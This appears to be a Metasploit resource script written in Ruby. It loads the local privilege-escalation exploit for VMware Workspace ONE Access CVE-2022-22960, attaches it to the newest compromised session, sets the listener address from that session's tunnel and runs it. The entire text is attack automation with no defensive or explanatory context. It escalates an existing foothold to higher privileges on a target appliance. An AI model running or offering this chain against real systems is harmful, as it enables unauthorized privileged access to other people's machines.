<ruby>
print_status("Running vmware_workspace cve-2022-22960")
run_single("use exploits/linux/local/vmware_workspace_one_access_cve_2022_22960")
run_single("set session -1")
session_lhost = framework.sessions[framework.sessions.keys.last].tunnel_local.split(':')[0]
run_single("set lhost #{session_lhost}")
run_single("run")
</ruby>
